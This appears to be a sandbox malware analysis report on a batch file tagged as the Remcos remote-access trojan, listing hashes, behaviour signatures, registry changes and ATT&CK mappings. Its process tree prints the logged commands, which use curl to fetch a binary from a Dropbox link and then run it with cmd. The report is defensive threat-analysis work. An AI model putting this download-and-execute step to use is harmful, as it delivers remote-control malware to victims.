remcos | f750343a9b985ca9449000c94432e53aa161b817b863b1cd4b5d8f0e872286dd

Analysis

max time kernel
92s
max time network
125s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-11-2024 11:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test - Kopie.bat
Size

937B
MD5

fcbd8f40ac27ccade02deb5f8b7496ff
SHA1

a01d275aa0f9bc4fc5d5c875cf6f227013c3a07c
SHA256

f750343a9b985ca9449000c94432e53aa161b817b863b1cd4b5d8f0e872286dd
SHA512

3df5f7b63166be333de67349541d05d04ddcad856372fa957ca517f29cb6832268972857282cab8f989096ad812228b651a1dd6029b516ca8c63d6a78951f5a8

Score

10^/10

remcos rat

Malware Config

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings	OpenWith.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5708	OpenWith.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3392 wrote to memory of 5280	3392	cmd.exe	78
PID 3392 wrote to memory of 5280	3392	cmd.exe	78
PID 3392 wrote to memory of 5124	3392	cmd.exe	79
PID 3392 wrote to memory of 5124	3392	cmd.exe	79

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test - Kopie.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3392
- C:\Windows\system32\curl.exe
  curl -L -o "test.bin" "https://www.dropbox.com/scl/fi/go4g22tj0t5b12ig0ohjb/test.bin?rlkey=5lnzusf90ok1cc4vkzhnif6l4&st=xhzj7uyn&dl=1"
  2⤵
  PID:5280
- C:\Windows\system32\cmd.exe
  cmd /c "test.bin"
  2⤵
  - Modifies registry class
  PID:5124

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DownloadAndRun\test.bin

Filesize
467KB

MD5
2cebaf36ff6bc2d6cb65fe5b05219320

SHA1
804d909e328929e357fb8b4c08a7c8a851920bed

SHA256
333c783deaee7a6685967a731bd8bd8d2009bb032c7e98d22df7973d350fbe7a

SHA512
bf6d4e95065f337d2900f5e6d6638661bebaa79ab896ea30718f727f3326fe9cd75264fb0804e53ed4b4ad9a45f304c4b53d05c9e292caa4974d83e696b0aa96

Download Submit